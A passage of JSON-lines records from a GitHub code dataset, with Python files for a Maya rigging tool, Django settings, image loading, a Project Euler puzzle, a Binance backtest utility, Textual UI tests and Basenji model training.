c.find(\"Group__\") == 0:\n returnModules.extend(self.DuplicateModule_processGroup(c))\n \n return returnModules\n \n \n def Publish(self, *args):\n \n result = pm.confirmDialog(messageAlign = \"center\", title = \"Publish Character\", message = \"The action of publishing cannot be undone. Make sure the geometry have been attached to the rig before proceeding. \\nAre you sure you wish to continue?\", button = [\"Accept\", \"Cancel\"], defaultButton = \"Accept\", cancelButton = \"Cancel\", dismissString = \"Cancel\")\n \n if result != \"Accept\":\n return\n \n # Name character to be published\n result = pm.promptDialog(title = \"Publish Character\", message = \"Please specify a character name ([a-z][A-Z][0-9] and _ only)\", button = [\"Accept\", \"Cancel\"], defaultButton = \"Accept\", cancelButton = \"Cancel\", dismissString = \"Cancel\")\n if result == \"Accept\":\n \n characterName = pm.promptDialog(query = True, text = True)\n #characterFileName = \"%s/Characters/%s.ma\" %(self.directory, characterName)\n characterFileName = \"%s/Characters/%s.ma\" %(os.environ[\"RIGGING_TOOL_ROOT\"], characterName)\n \n if os.path.exists(characterFileName):\n pm.confirmDialog(title = \"Publish Character\", message = \"Character already exists with that name. Aborting publish.\", button = [\"Accept\"], defaultButton = \"Accept\")\n return\n \n pm.lockNode(\"Blueprints_Locked\", lock = False, lockUnpublished = False)\n pm.delete(\"Blueprints_Locked\")\n \n pm.namespace(setNamespace = \":\")\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n # Collect valid module names\n moduleNameInfo = utils.FindAllModuleNames(\"/Modules/Blueprint\")\n validModules = moduleNameInfo[0]\n validModuleNames = moduleNameInfo[1]\n \n # Compare module(s) for validity\n foundModuleInstances = []\n for n in namespaces:\n splitString = n.partition(\"__\")\n \n if splitString[1] != '':\n module = splitString[0]\n \n if module in validModuleNames:\n foundModuleInstances.append(n)\n \n \n moduleGroups = []\n moduleContainers = []\n \n # Collect module groups and containers\n for moduleInstance in foundModuleInstances:\n moduleGroups.append(\"%s:module_grp\" %moduleInstance)\n moduleContainers.append(\"%s:module_container\" %moduleInstance)\n \n # Unlock containers\n for container in moduleContainers:\n pm.lockNode(container, lock = False, lockUnpublished = False)\n \n # Group modules together as a character\n characterGroup = pm.group(empty = True, name = \"character_grp\")\n for group in moduleGroups:\n pm.parent(group, characterGroup, absolute = True)\n \n \n pm.select(characterGroup, replace = True)\n pm.addAttr(attributeType = \"bool\", defaultValue = 0, keyable = False, longName = \"moduleMaintenanceVisibility\")\n pm.addAttr(attributeType = \"bool\", defaultValue = 1, keyable = True, longName = \"animationControlVisibility\")\n \n invertModuleMaintenanceVisibility = pm.shadingNode(\"reverse\", name = \"reverse_moduleMaintenanceVisibility\", asUtility = True)\n pm.connectAttr(\"%s.moduleMaintenanceVisibility\" %characterGroup, \"%s.inputX\" %invertModuleMaintenanceVisibility, force = True)\n \n moduleVisibilityMultiply = pm.shadingNode(\"multiplyDivide\", name = \"moduleVisibilityMultiply\", asUtility = True)\n pm.connectAttr(\"%s.outputX\" %invertModuleMaintenanceVisibility, \"%s.input1X\" %moduleVisibilityMultiply)\n pm.connectAttr(\"%s.animationControlVisibility\" %characterGroup, \"%s.input2X\" %moduleVisibilityMultiply)\n \n # Create a list containing all of the character nodes\n characterNodes = list(moduleContainers)\n characterNodes.append(characterGroup)\n characterNodes.append(invertModuleMaintenanceVisibility)\n characterNodes.append(moduleVisibilityMultiply)\n \n # Add list to a character container\n characterContainer = pm.container(name = \"character_container\")\n utils.AddNodeToContainer(characterContainer, characterNodes)\n \n pm.container(characterContainer, edit = True, publishAndBind = [\"%s.animationControlVisibility\" %characterGroup, \"animationControlVisibility\"])\n \n # Publish the module containers attributes to the character container\n for container in moduleContainers:\n moduleNamespace = utils.StripLeadingNamespace(container)[0]\n blueprintJointsGrp = \"%s:blueprint_joints_grp\" %moduleNamespace\n \n pm.connectAttr(\"%s.moduleMaintenanceVisibility\" %characterGroup, \"%s.visibility\" %blueprintJointsGrp)\n pm.setAttr(\"%s.overrideEnabled\" %blueprintJointsGrp, 1)\n \n publishedNames = pm.container(container, query = True, publishName = True)\n userSpecifiedName = moduleNamespace.partition(\"__\")[2]\n \n for name in publishedNames:\n pm.container(characterContainer, edit = True, publishAndBind = [\"%s.%s\" %(container, name), \"%s_%s\" %(userSpecifiedName, name)])\n \n \n characterContainers = list(moduleContainers)\n characterContainers.append(characterContainer)\n \n # Select top level transforms in scene\n pm.select(all = True)\n topLevelTransforms = pm.ls(selection = True, transforms = True)\n pm.select(clear = True)\n \n topLevelTransforms.remove(characterGroup)\n \n # Create visibility attributes and add to character container\n if len(topLevelTransforms) != 0:\n nonBlueprintGroup = pm.group(topLevelTransforms, absolute = True, parent = characterGroup, name = \"non_blueprint_grp\")\n pm.setAttr(\"%s.overrideEnabled\" %nonBlueprintGroup, 1)\n pm.setAttr(\"%s.overrideDisplayType\" %nonBlueprintGroup, 2) # Reference display type\n \n pm.select(nonBlueprintGroup, replace = True)\n pm.addAttr(attributeType = \"bool\", defaultValue = 1, longName = \"display\", keyable = True)\n \n visibilityMultiply = pm.shadingNode(\"multiplyDivide\", name = \"non_blueprint_visibilityMultiply\", asUtility = True)\n pm.connectAttr(\"%s.outputX\" %invertModuleMaintenanceVisibility, \"%s.input1X\" %visibilityMultiply, force = True)\n pm.connectAttr(\"%s.display\" %nonBlueprintGroup, \"%s.input2X\" %visibilityMultiply, force = True)\n pm.connectAttr(\"%s.outputX\" %visibilityMultiply, \"%s.visibility\" %nonBlueprintGroup, force = True)\n \n nonBlueprintContainer = pm.container(addNode = nonBlueprintGroup, includeHierarchyBelow = True, includeNetwork = True, includeShapes = True, name = \"non_blueprint_container\")\n utils.AddNodeToContainer(characterContainer, nonBlueprintContainer)\n characterContainers.append(nonBlueprintContainer)\n \n publishedName = \"displayNonBlueprintNodes\"\n pm.container(nonBlueprintContainer, edit = True, publishAndBind = [\"%s.display\" %nonBlueprintGroup, publishedName])\n pm.container(characterContainer, edit = True, publishAndBind = [\"%s.%s\" %(nonBlueprintContainer, publishedName), publishedName])\n \n # Lock character container\n for container in characterContainers:\n pm.lockNode(container, lock = True, lockUnpublished = True)\n \n \n # Export character as a .ma file\n pm.select(characterContainer, replace = True)\n pm.exportSelected(characterFileName, type = \"mayaAscii\")\n \n # Create locator to mark scene as published\n scenePublished = pm.spaceLocator(name = \"Scene_Published\")\n pm.setAttr(\"%s.visibility\" %scenePublished, 0)\n pm.lockNode(scenePublished, lock = True, lockUnpublished = True)\n \n \n pm.select(clear = True)\n \n pm.button(self.UIElements[\"publishBtn\"], edit = True, enable = False)","repo_name":"Shadowtags/ModularRiggingTool","sub_path":"nwModularRiggingTool/Modules/System/blueprint_UI.py","file_name":"blueprint_UI.py","file_ext":"py","file_size_in_byte":63138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41329160275","text":"# Django settings.\n\nimport environ\nfrom pathlib import Path\n\n\nBASE_DIR = Path(__file__).resolve().parent.parent\nenv = environ.Env()\nenviron.Env.read_env(BASE_DIR / '.env')\n\n\n# Security\n\nSECRET_KEY = env(\n 'SECRET_KEY',\n default='django-insecure-bdmvw1%zbrd1@6760ok)9k4mc3o+t39m_56(pc!e=5g#*g_2vb',\n)\nDEBUG = env.bool('DEBUG', default=False)\nALLOWED_HOSTS = env.list('ALLOWED_HOSTS', default=['localhost', '0.0.0.0', '127.0.0.1'])\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.auth',\n 'project.shortener',\n 'rest_framework',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'project.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'project.wsgi.application'\n\n\n# Database & cache\n\nDATABASES = {'default': env.db('DATABASE_URI')}\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\nUSE_CACHE = env.bool('USE_CACHE', True)\nCACHES = {\n 'default': env.cache(\n 'CACHE_URL', backend='django.core.cache.backends.redis.RedisCache'\n )\n}\n\n\n# Internationalization\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = False\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n\nSTATIC_URL = '/static/'\n\n\n# REDIS related settings\n\nBROKER_URL = env('BROKER_URL')\nRESULT_BACKEND = env('RESULT_BACKEND')\n\n\n# Logging settings\nLOG_LEVEL = env.str('LOG_LEVEL', 'INFO')\nLOG_FILE_NAME = env.str('LOG_FILE_NAME', default=BASE_DIR / 'shortener.log')\nUSE_LOG_FILE = env.bool('USE_LOG_FILE', False)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '{levelname}|{asctime}|{filename}:{lineno} {message}',\n 'style': '{',\n 'datefmt': '%Y-%m-%dT%H:%M:%S',\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n },\n 'loggers': {\n 'project.shortener': {\n 'level': LOG_LEVEL,\n 'handlers': ['console'],\n }\n },\n}\n\nif USE_LOG_FILE:\n file_handler = {\n 'level': LOG_LEVEL,\n 'class': 'logging.FileHandler',\n 'filename': LOG_FILE_NAME,\n 'formatter': 'default',\n }\n LOGGING.get('handlers')['file'] = file_handler # noqa\n LOGGING.get('loggers').get('project.shortener').get('handlers', []).append('file')\n\n\n# Django Rest Framework\nPAGINATION_PAGE_SIZE = env.int('PAGINATION_PAGE_SIZE', default=20)\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': PAGINATION_PAGE_SIZE,\n}\n\n\n# Shortener settings\nBASE_ENCODING = env.str(\n 'BASE_ENCODING', '23456789abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'\n)\nSUBPART_HASH_LEN = env.int('SUBPART_HASH_LEN', 11)\nSESSION_COOKIE_AGE = env.int('SESSION_COOKIE_AGE', 1209600) # Two weeks\nDIRECTION_LIFETIME_SEC = env.int('DIRECTION_LIFETIME_SEC', SESSION_COOKIE_AGE)\nCACHE_ON_CREATE = env.bool('CACHE_ON_CREATE', True)\nSCHEDULE_CLEAR_DATA_MINUTES = env.int('SCHEDULE_CLEAR_DATA_MINUTES', 60)\nLINES_ON_PAGE = env.int('LINES_ON_PAGE', PAGINATION_PAGE_SIZE)\nLAST_TRY_NUM = env.int('LAST_TRY_NUM', 10)\n","repo_name":"YOricH/TestShortener","sub_path":"project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17091391399","text":"import argparse\nimport glob\nfrom PIL import Image\nimport time\nimport numpy as np\n\nfrom NeuNorm.normalization import Normalization\n\nparser = argparse.ArgumentParser(description='Loading tiff using parallel processing')\nparser.add_argument('-f', '--files', help='list of files to load')\nparser.add_argument('--algo', help='algo to use to load data')\n\ndef run_processing():\n\n args = parser.parse_args()\n list_of_files = glob.glob(args.files)\n\n print(f\"Loading {len(list_of_files)} files\")\n data = []\n\n if args.algo == 'pillow':\n\n print(\"using algo pillow\")\n for _file in list_of_files:\n _image = Image.open(_file)\n _data = np.asarray(_image)\n data.append(_data)\n\n elif args.algo == 'neunorm':\n\n print(\"using algo NeuNorm\")\n o_norm = Normalization()\n o_norm.load(file=list_of_files, gamma_filter=True)\n data = o_norm.data['sample']['data']\n\n print(np.shape(data))\n\nif __name__ == \"__main__\":\n start_time = time.time()\n run_processing()\n end_time = time.time()\n\n print(f\"It took {end_time - start_time}s\")\n","repo_name":"JeanBilheux/python_101","sub_path":"parallelization/python_code_mpi/parallel_processing_loading_images.py","file_name":"parallel_processing_loading_images.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"16542814495","text":"import utils\n\ncubes = set(str(i**3) for i in range(0, 10000))\ndigit_map = {}\nfor cube in cubes:\n key = sum(int(ch) for ch in cube)\n if key not in digit_map:\n digit_map[key] = []\n digit_map[key].append(cube)\n\nMIN_LEN = 5\ndef gen():\n for digit_sum, cubelist in digit_map.items():\n if len(cubelist) < MIN_LEN: continue # not a possible answer so don't bother checking permuts\n for cube in cubelist:\n permuts = [p for p in cubelist if p >= cube and utils.check_permutation(cube, p)]\n if len(permuts) == MIN_LEN: yield min(permuts)\n\nprint(min(gen()))\n","repo_name":"wrschneider/project-euler","sub_path":"p062.py","file_name":"p062.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18093682787","text":"import datetime\nimport functools\nimport time\nimport pandas as pd\nimport pandas_ta as ta\n\nimport os\nimport sys\nfile_dir = os.path.dirname(os.path.realpath(__file__))\nroot_dir = os.path.abspath(file_dir + '/..')\nsys.path.append(os.path.normpath(root_dir)) \n\nfrom binance.futures import Futures \nfrom pprint import pprint\nfrom decimal import *\nfrom service.formula import FormulaService\n\nclass UtilService(object):\n\n def __init__(self):\n self.client = Futures(\n key=os.environ.get('KEY_TESTNET_BINANCE'),\n secret=os.environ.get('SECRET_TESTNET_BINANCE'))\n self.info = None\n\n def compare_time(self, date_time_1, date_time_2): \n return (date_time_1-date_time_2).total_seconds() / 60\n\n def mapCandleData(self, res):\n open_time = datetime.datetime.fromtimestamp(res[0]/1000)\n return {\n 'open_time': open_time,\n 'open': float(Decimal(res[1])),\n 'high': float(Decimal(res[2])),\n 'low': float(Decimal(res[3])),\n 'close': float(Decimal(res[4])),\n }\n\n def get_value(self, old_price, new_price, quantity): \n total_old_price = quantity * old_price \n total_new_price = quantity * new_price \n return abs(total_new_price - total_old_price)\n\n def get_candle(self, response, start, end):\n return response[start:end]\n\n def is_take_profit(self, high_price, low_price, take_profit_price):\n if take_profit_price and take_profit_price != 0 and high_price >= take_profit_price: return True\n return False\n\n def is_stop_loss(self, high_price, low_price, stop_loss_price):\n if stop_loss_price and stop_loss_price != 0 and low_price <= stop_loss_price: return True\n return False\n\n def get_fee(self, current_price, quantity, fee_rate=0.0004):\n return quantity * current_price * fee_rate\n\n def finish_order(self, open_time, current_time, high, low, last_price, balance, order):\n take_profit = order['take_profit']\n stop_loss = order['stop_loss']\n quantity = order['quantity']\n leverage = order['leverage'] \n entry = order['entry']\n\n if(self.is_take_profit(high, low, take_profit)):\n balance += self.get_value(entry, take_profit, quantity) - 2*self.get_fee(last_price, quantity)\n order['balance_finish'] = balance\n order['value (+fee)'] = self.get_value(entry, take_profit, quantity) - 2*self.get_fee(last_price, quantity)\n order['is_finish'] = True\n order['close_time'] = str(current_time)\n order['keep (min)'] = self.compare_time(current_time, open_time)\n order['type'] = 'TAKE_PROFIT'\n\n elif(self.is_stop_loss(high, low, stop_loss)): \n balance -= (self.get_value(entry, stop_loss, quantity) + 2*self.get_fee(last_price, quantity))\n order['balance_finish'] = balance\n order['value (+fee)'] = -1 * (self.get_value(entry, stop_loss, quantity) + 2*self.get_fee(last_price, quantity))\n order['is_finish'] = True \n order['close_time'] = str(current_time)\n order['keep (min)'] = self.compare_time(current_time, open_time)\n order['type'] = 'STOP_LOSS'\n \n return balance\n\n def get_precision(self, symbol, precision):\n if self.info == None: \n self.info = self.client.exchange_info()\n for x in self.info['symbols']:\n if x['symbol'] == symbol:\n return x[precision]\n\n def get_quantity_allow(self, allow_money, current_price, leverage, symbol):\n return round(allow_money * leverage / current_price, self.get_precision(symbol, 'quantityPrecision'))\n \n def get_reverse_direction(self, direction):\n if direction == 'BUY': return 'SELL'\n return 'BUY'\n\n def run_report(self, symbol, mark_klines, balance, allow_money, leverage, limit = 31, risk=2, reward=8):\n take_profit = 0\n stop_loss = 0\n end = 41\n book_order = {}\n count_win = 0\n count_lose = 0\n count_draw = 0\n\n for i in range(0, limit - end):\n is_can_next_order = True\n candle = list(map(self.mapCandleData, self.get_candle(mark_klines, i, end + i)))\n direction = FormulaService.formula(candle)\n last_price = candle[-1]['close']\n # if balance < leverage * last_price: \n # print('Balance is insufficient. Balance: {}'.format(balance))\n # assert('Balance is insufficient. Balance: {}'.format(balance))\n # return None, None, None\n current_order = None\n current_book_time = None\n for book_time, order in book_order.items():\n if order['is_finish'] == False: \n balance = self.finish_order(book_time, candle[-1]['open_time'], candle[-1]['high'], candle[-1]['low'], candle[-1]['close'], balance, order)\n if order['type'] == 'TAKE_PROFIT': count_win += 1\n if order['type'] == 'STOP_LOSS': count_lose += 1\n if order['is_finish'] == False: \n current_order = order\n current_book_time = book_time\n is_can_next_order = False \n if current_book_time != None and current_order != None and is_can_next_order == False and self.get_reverse_direction(current_order['direction']) == direction:\n book_order[current_book_time]['is_finish'] = 'NONE' \n book_order[current_book_time]['type'] = 'CHANGE_DIRECTION' \n book_order[current_book_time]['value (+fee)'] = round(book_order[current_book_time]['fee'], self.get_precision(symbol, 'pricePrecision'))\n book_order[current_book_time]['balance_finish'] -= round(book_order[current_book_time]['fee'], self.get_precision(symbol, 'pricePrecision'))\n balance -= book_order[current_book_time]['fee']\n count_draw += 1\n is_can_next_order = True\n\n if direction != '' and is_can_next_order: \n entry = last_price\n if direction == 'BUY':\n take_profit = round(last_price + last_price * (reward / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n stop_loss = round(last_price - last_price * (risk / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n else: \n stop_loss = round(last_price + last_price * (risk / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n take_profit = round(last_price - last_price * (reward / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n\n quantity = self.get_quantity_allow(allow_money, last_price, leverage, symbol)\n quantity_not_leverage = round(quantity / leverage, self.get_precision(symbol, 'quantityPrecision'))\n if balance <= allow_money: \n balance += allow_money\n return book_order, balance, count_win, count_lose\n book_order[candle[-1]['open_time']] = {\n # 'close_time': '',\n 'keep (min)': '',\n # 'open': candle[-1]['open'],\n # 'close': candle[-1]['close'],\n # 'high': candle[-1]['high'],\n # 'low': candle[-1]['low'],\n 'balance': balance,\n 'type': '',\n 'balance_finish': balance,\n 'value (+fee)': 0,\n 'allow_money': allow_money,\n 'direction': direction,\n 'entry': last_price,\n 'quantity': quantity,\n 'quantity_real': quantity_not_leverage,\n 'leverage': leverage,\n 'fee': self.get_fee(last_price, quantity),\n 'take_profit': take_profit,\n 'stop_loss': stop_loss,\n 'is_finish': False,\n } \n return book_order, balance, count_win, count_lose, count_draw\n\n def export_csv_order(self, path, book_order):\n df = pd.DataFrame(book_order)\n df = df.transpose()\n df.to_csv(path)","repo_name":"duytnb79/hilo","sub_path":"service/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18861134500","text":"from textual.app import App\nfrom textual.screen import Screen\nfrom textual.widgets import ListView, Label\nfrom dyno_viewer.components.screens.region_select import RegionSelectScreen\nfrom textual.reactive import reactive\nimport pytest\n\n\n@pytest.fixture()\ndef screen_app():\n class ScreensApp(App[None]):\n SCREENS = {\"regionSelect\": RegionSelectScreen()}\n\n region = reactive(\"\")\n\n async def on_region_select_screen_region_selected(\n self, selected_region: RegionSelectScreen.RegionSelected\n ) -> None:\n self.region = selected_region.region\n\n return ScreensApp\n\n\nasync def test_list_regions(iam, screen_app):\n async with screen_app().run_test() as pilot:\n await pilot.app.push_screen(\"regionSelect\")\n\n list_view: ListView = pilot.app.query_one(ListView)\n regions = [item.id for item in list_view.children]\n assert regions == [\n \"af-south-1\",\n \"ap-east-1\",\n \"ap-northeast-1\",\n \"ap-northeast-2\",\n \"ap-northeast-3\",\n \"ap-south-1\",\n \"ap-south-2\",\n \"ap-southeast-1\",\n \"ap-southeast-2\",\n \"ap-southeast-3\",\n \"ap-southeast-4\",\n \"ca-central-1\",\n \"eu-central-1\",\n \"eu-central-2\",\n \"eu-north-1\",\n \"eu-south-1\",\n \"eu-south-2\",\n \"eu-west-1\",\n \"eu-west-2\",\n \"eu-west-3\",\n 'il-central-1',\n \"me-central-1\",\n \"me-south-1\",\n \"sa-east-1\",\n \"us-east-1\",\n \"us-east-2\",\n \"us-west-1\",\n \"us-west-2\",\n ]\n\n\n# @pytest.mark.asyncio\nasync def test_select_region(iam, screen_app):\n async with screen_app().run_test() as pilot:\n await pilot.app.push_screen(\"regionSelect\")\n\n assert pilot.app.SCREENS[\"regionSelect\"].is_current\n\n await pilot.press(\"tab\")\n\n assert pilot.app.query_one(ListView).index == 0\n\n await pilot.press(\"down\")\n\n assert pilot.app.query_one(ListView).index == 1\n await pilot.press(\"down\")\n\n assert pilot.app.query_one(ListView).index == 2\n await pilot.press(\"enter\")\n assert pilot.app.region == \"ap-northeast-1\"\n\n assert not pilot.app.SCREENS[\"regionSelect\"].is_current\n","repo_name":"mrllama123/dyno-viewer","sub_path":"tests/unit/screens/test_region_select_screen.py","file_name":"test_region_select_screen.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"1845757302","text":"from __future__ import print_function\n\nimport logging\nfrom queue import Queue\nimport sys\nfrom threading import Thread\nimport time\nimport glob\nfrom os import path\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom basenji import params\nfrom basenji import seqnn\nfrom basenji import shared_flags\nfrom basenji import tfrecord_batcher\nfrom basenji.util import set_logger\n\nFLAGS = tf.app.flags.FLAGS\n\n# /data/genome-attention/tfrecords\n\ndef main(_):\n np.random.seed(FLAGS.seed)\n run(dir=FLAGS.dir)\n\n\ndef run(dir):\n set_logger(path.join(dir, \"experiment.log\"))\n\n # read parameters\n job = params.read_job_params(path.join(dir, \"params.txt\"))\n tfr_dir = job[\"data_dir\"]\n test_file = None\n train_file = None\n test_epoch_batches = job[\"test_epoch_batches\"]\n train_epoch_batches = job[\"train_epoch_batches\"]\n train_epochs = job[\"train_epochs\"]\n\n if tfr_dir:\n # load data\n data_ops, training_init_op, test_init_op = make_data_ops(\n job,\n tfr_dir=tfr_dir\n )\n elif train_file and test_file:\n data_ops, training_init_op, test_init_op = make_data_ops(\n job,\n train_file=train_file,\n test_file=test_file\n )\n else:\n raise Exception(\n 'train and/or test paths missing. Aborting.'\n )\n \n save_dir = dir if \"save_dir\" not in job else job[\"save_dir\"]\n model_dir = path.join(save_dir, \"model\")\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n # initialize model\n model = seqnn.SeqNN()\n model.build_from_data_ops(job, data_ops)\n\n # launch accuracy compute thread\n acc_queue = Queue()\n acc_thread = AccuracyWorker(acc_queue)\n acc_thread.start()\n\n # checkpoints\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n train_writer = tf.summary.FileWriter(dir + '/train',\n sess.graph) if dir else None\n\n coord = tf.train.Coordinator()\n tf.train.start_queue_runners(coord=coord)\n\n t0 = time.time()\n print('Initializing...')\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n print('Initialization time %f' % (time.time() - t0))\n\n if 'restart' in job:\n # only include\n restore_variables = [var for var in tf.global_variables() if \"attention\" not in var.name and \"cnn_final\" not in var.name and \"decay_factor\" not in var.name]\n restore_saver = tf.train.Saver(var_list = restore_variables)\n # load variables into session\n restore_saver.restore(sess, job['restart'])\n #else:\n # # initialize variables\n # t0 = time.time()\n # print('Initializing...')\n # sess.run(tf.local_variables_initializer())\n # sess.run(tf.global_variables_initializer())\n # print('Initialization time %f' % (time.time() - t0))\n\n train_loss = None\n best_loss = None\n early_stop_i = 0\n\n epoch = 0\n while (train_epochs is not None and epoch < train_epochs) or \\\n (train_epochs is None and early_stop_i < FLAGS.early_stop):\n t0 = time.time()\n\n # save previous\n train_loss_last = train_loss\n\n # train epoch\n print(\"Training – epoch: {}\".format(epoch))\n sess.run(training_init_op)\n train_loss, steps = model.train_epoch_tfr(sess, train_writer, train_epoch_batches)\n\n # block for previous accuracy compute\n acc_queue.join()\n\n # test validation\n print(\"Validation – epoch: {}\".format(epoch))\n sess.run(test_init_op)\n valid_acc = model.test_tfr(sess, test_epoch_batches)\n\n # consider as best\n best_str = ''\n if best_loss is None or valid_acc.loss < best_loss:\n best_loss = valid_acc.loss\n best_str = ', best!'\n early_stop_i = 0\n saver.save(sess, path.join(model_dir, \"model_best.tf\"))\n else:\n early_stop_i += 1\n\n # measure time\n epoch_time = time.time() - t0\n if epoch_time < 600:\n time_str = '%3ds' % epoch_time\n elif epoch_time < 6000:\n time_str = '%3dm' % (epoch_time / 60)\n else:\n time_str = '%3.1fh' % (epoch_time / 3600)\n\n # compute and write accuracy update\n #accuracy_update(epoch, steps, train_loss, valid_acc, time_str, best_str)\n acc_queue.put((epoch, steps, train_loss, valid_acc, time_str, best_str, train_writer))\n\n # update epoch\n epoch += 1\n\n # finish queue\n acc_queue.join()\n\n if FLAGS.logdir:\n train_writer.close()\n\n\ndef accuracy_update(epoch, steps, train_loss, valid_acc, time_str, best_str):\n \"\"\"Compute and write accuracy update.\"\"\"\n\n # compute validation accuracy\n valid_r2 = valid_acc.r2().mean()\n valid_corr = valid_acc.pearsonr().mean()\n\n # print update\n update_line = 'Train loss: %7.5f, Valid loss: %7.5f,' % (train_loss, valid_acc.loss)\n update_line += ' Valid R2: %7.5f, Valid R: %7.5f, Time: %s%s' % (valid_r2, valid_corr, time_str, best_str)\n update_line += '\\n========================================================================================='\n print(update_line, flush=True)\n\n del valid_acc\n\n\ndef make_data_ops(job, train_file=None, test_file=None, tfr_dir=None):\n def make_dataset(loc, mode, is_dir=False):\n \"\"\"\n Creates the tfrecord dataset.\n\n This function is now expected to take either some filename string OR a\n list of filename strings as the data source for tfrecord_dataset.\n \"\"\"\n if is_dir:\n pattern = ''\n if mode == tf.estimator.ModeKeys.TRAIN:\n pattern = 'train-*.tfr'\n elif mode == tf.estimator.ModeKeys.EVAL:\n pattern = 'valid-*.tfr'\n elif mode == tf.estimator.ModeKeys.PREDICT:\n pattern = 'test-*.tfr'\n else:\n raise Exception('unrecognized tfrecord mode. Aborting.')\n pattern = path.join(loc, pattern)\n\n return tfrecord_batcher.tfrecord_dataset(\n pattern,\n job['batch_size'],\n job['seq_length'],\n job['seq_depth'],\n job['target_length'],\n job['num_targets'],\n mode=mode,\n repeat=False\n )\n else:\n return tfrecord_batcher.tfrecord_dataset(\n loc,\n job['batch_size'],\n job['seq_length'],\n job.get('seq_depth', 4),\n job['target_length'],\n job['num_targets'],\n mode=mode,\n repeat=False\n )\n\n if tfr_dir:\n training_dataset = make_dataset(tfr_dir, mode=tf.estimator.ModeKeys.TRAIN, is_dir=True)\n test_dataset = make_dataset(tfr_dir, mode=tf.estimator.ModeKeys.EVAL, is_dir=True)\n else:\n training_dataset = make_dataset(train_file, mode=tf.estimator.ModeKeys.TRAIN)\n test_dataset = make_dataset(test_file, mode=tf.estimator.ModeKeys.EVAL)\n\n iterator = tf.data.Iterator.from_structure(\n training_dataset.output_types, training_dataset.output_shapes)\n data_ops = iterator.get_next()\n\n training_init_op = iterator.make_initializer(training_dataset)\n test_init_op = iterator.make_initializer(test_dataset)\n\n return data_ops, training_init_op, test_init_op\n\n\nclass AccuracyWorker(Thread):\n \"\"\"Compute accuracy statistics and print update line.\"\"\"\n def __init__(self, acc_queue):\n Thread.__init__(self)\n self.queue = acc_queue\n self.daemon = True\n\n def run(self):\n while True:\n try:\n # get args\n epoch, steps, train_loss, valid_acc, time_str, best_str, writer = self.queue.get()\n\n # compute validation accuracy\n valid_r2 = valid_acc.r2().mean()\n valid_corr = valid_acc.pearsonr().mean()\n\n # add summary\n r2_summary = tf.Summary(value=[tf.Summary.Value(tag=\"valid_r2\",\n simple_value=valid_r2)])\n writer.add_summary(r2_summary, steps) \n r_summary = tf.Summary(value=[tf.Summary.Value(tag=\"valid_r\",\n simple_value=valid_corr)])\n writer.add_summary(r_summary, steps) \n loss_summary = tf.Summary(value=[tf.Summary.Value(tag=\"valid_loss\",\n simple_value=valid_acc.loss)]) \n writer.add_summary(loss_summary, steps)\n\n # print update\n update_line = 'Epoch: %3d, Steps: %7d, Train loss: %7.5f, Valid loss: %7.5f,' % (epoch+1, steps, train_loss, valid_acc.loss)\n update_line += ' Valid R2: %7.5f, Valid R: %7.5f, Time: %s%s' % (valid_r2, valid_corr, time_str, best_str)\n logging.info(update_line)\n\n # delete predictions and targets\n del valid_acc\n\n except:\n # communicate error\n print('ERROR: epoch accuracy and progress update failed.', flush=True)\n\n # communicate finished task\n self.queue.task_done()\n\n\nif __name__ == '__main__':\n tf.app.run(main)\n","repo_name":"seyuboglu/genome-attention","sub_path":"bin/basenji_train_queues.py","file_name":"basenji_train_queues.py","file_ext":"py","file_size_in_byte":8705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72911952040","text":"from django.urls import path\n\nfrom apps.user.views import read, create, update, delete, user_register, process_register, user_verification, process_verification\n\nurlpatterns = [\n path('create', create, name='user-create'),\n path('', read, name='user-read'),\n path('update/', update, name='user-update'),\n path('delete/', delete, name='user-delete'),\n 